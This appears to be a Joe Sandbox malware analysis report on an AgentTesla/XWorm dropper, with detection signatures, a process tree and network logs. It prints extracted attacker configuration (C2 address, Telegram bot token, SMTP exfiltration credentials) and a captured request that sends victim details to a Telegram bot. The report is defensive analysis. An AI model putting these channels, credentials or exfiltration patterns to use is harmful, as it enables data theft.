Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DJ5PhUwOsM.exe

Overview

General Information

Sample name:DJ5PhUwOsM.exe
renamed because original name is a hash value
Original sample name:65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa.exe
Analysis ID:1562433
MD5:d61526463472da19dd8869f484a8f4ef
SHA1:20514ac586fb6847057be18ecf00b84cda7e948f
SHA256:65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa
Tags:89-40-31-232exeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DJ5PhUwOsM.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\DJ5PhUwOsM.exe" MD5: D61526463472DA19DD8869F484A8F4EF)
    • FB_7BD8.tmp.exe (PID: 6404 cmdline: "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe" MD5: A21DF2C0CCA131EB534F520FD641ADB5)
    • FB_7D21.tmp.exe (PID: 4444 cmdline: "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe" MD5: 068C99328320CAAA7C5F2D31B0FF214B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
SourceRuleDescriptionAuthorStrings
DJ5PhUwOsM.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    DJ5PhUwOsM.exeJoeSecurity_XWormYara detected XWormJoe Security
      DJ5PhUwOsM.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        DJ5PhUwOsM.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          DJ5PhUwOsM.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
                SourceRuleDescriptionAuthorStrings
                C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeJoeSecurity_XWormYara detected XWormJoe Security
                  C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xfc48:$cnc4: POST / HTTP/1.1
                    C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                        Click to see the 1 entries
                        SourceRuleDescriptionAuthorStrings
                        00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                          00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                          • 0x109da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          • 0x10a77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                          • 0x10b8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                          • 0xfa48:$cnc4: POST / HTTP/1.1
                          00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                            00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                              00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                                Click to see the 20 entries
                                SourceRuleDescriptionAuthorStrings
                                0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                                  0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                    0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                                    • 0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                    • 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                                    • 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                                    • 0xfc48:$cnc4: POST / HTTP/1.1
                                    3.0.FB_7D21.tmp.exe.fa0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                                      3.0.FB_7D21.tmp.exe.fa0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                        Click to see the 43 entries

                                        System Summary

                                        barindex
                                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Initiated: true, ProcessId: 6404, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
                                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                        2024-11-25T15:36:14.278202+010020301711A Network Trojan was detected192.168.2.549705162.254.34.31587TCP
                                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                        2024-11-25T15:36:25.737135+010028555421A Network Trojan was detected192.168.2.549705162.254.34.31587TCP
                                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                        2024-11-25T15:36:25.737135+010028552451A Network Trojan was detected192.168.2.549705162.254.34.31587TCP
                                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                        2024-11-25T15:36:14.278202+010028400321A Network Trojan was detected192.168.2.549705162.254.34.31587TCP
                                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                        2024-11-25T15:36:25.030421+010028536851A Network Trojan was detected192.168.2.549706149.154.167.220443TCP

                                        Click to jump to signature section

                                        Show All Signature Results

                                        AV Detection

                                        barindex
                                        Source: DJ5PhUwOsM.exeAvira: detected
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeAvira: detection malicious, Label: TR/Spy.Gen
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeAvira: detection malicious, Label: TR/Spy.Gen8
                                        Source: 00000003.00000002.4524379102.0000000003341000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeReversingLabs: Detection: 87%
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeReversingLabs: Detection: 81%
                                        Source: DJ5PhUwOsM.exeReversingLabs: Detection: 92%
                                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeJoe Sandbox ML: detected
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeJoe Sandbox ML: detected
                                        Source: DJ5PhUwOsM.exeJoe Sandbox ML: detected
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpackString decryptor: 89.40.31.232
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpackString decryptor: 1717
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpackString decryptor: <Xwormmm>
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpackString decryptor: 28Nov2024
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpackString decryptor: USB.exe
                                        Source: DJ5PhUwOsM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2

                                        Networking

                                        barindex
                                        Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49705 -> 162.254.34.31:587
                                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49705 -> 162.254.34.31:587
                                        Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49705 -> 162.254.34.31:587
                                        Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49705 -> 162.254.34.31:587
                                        Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49706 -> 149.154.167.220:443
                                        Source: Malware configuration extractorURLs: 89.40.31.232
                                        Source: unknownDNS query: name: api.telegram.org
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED
                                        Source: global trafficTCP traffic: 192.168.2.5:49705 -> 162.254.34.31:587
                                        Source: global trafficTCP traffic: 192.168.2.5:49707 -> 89.40.31.232:1717
                                        Source: global trafficHTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                                        Source: Joe Sandbox ViewASN Name: TELEMEDIA-ASRO TELEMEDIA-ASRO
                                        Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                        Source: unknownDNS query: name: api.ipify.org
                                        Source: unknownDNS query: name: api.ipify.org
                                        Source: global trafficTCP traffic: 192.168.2.5:49705 -> 162.254.34.31:587
                                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                                        Source: global trafficHTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                        Source: FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C1DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                                        Source: FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4524379102.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                        Source: DJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.drString found in binary or memory: https://account.dyn.com/
                                        Source: DJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.drString found in binary or memory: https://api.ipify.org
                                        Source: FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                                        Source: FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                                        Source: DJ5PhUwOsM.exe, FB_7D21.tmp.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2

                                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                                        barindex
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, SKTzxzsJw.cs.Net Code: nUAqbab
                                        Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, SKTzxzsJw.cs.Net Code: nUAqbab
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                        Operating System Destruction

                                        barindex
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: 01 00 00 00 Jump to behavior

                                        System Summary

                                        barindex
                                        Source: DJ5PhUwOsM.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                        Source: DJ5PhUwOsM.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                        Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                        Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                        Source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                        Source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                        Source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                        Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess Stats: CPU usage > 49%
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_00E7E2702_2_00E7E270
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_00E7A9582_2_00E7A958
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_00E74A982_2_00E74A98
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_00E73E802_2_00E73E80
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_00E741C82_2_00E741C8
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_00E7C36F2_2_00E7C36F
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064F56402_2_064F5640
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064F66682_2_064F6668
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064F7DF02_2_064F7DF0
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064FC2002_2_064FC200
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064FB2A22_2_064FB2A2
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064F31002_2_064F3100
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064F77102_2_064F7710
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064F24092_2_064F2409
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064FE4182_2_064FE418
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064F5D5F2_2_064F5D5F
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064F00402_2_064F0040
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_064F00062_2_064F0006
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeCode function: 3_2_00007FF848F28EF23_2_00007FF848F28EF2
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeCode function: 3_2_00007FF848F281463_2_00007FF848F28146
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeCode function: 3_2_00007FF848F2651D3_2_00007FF848F2651D
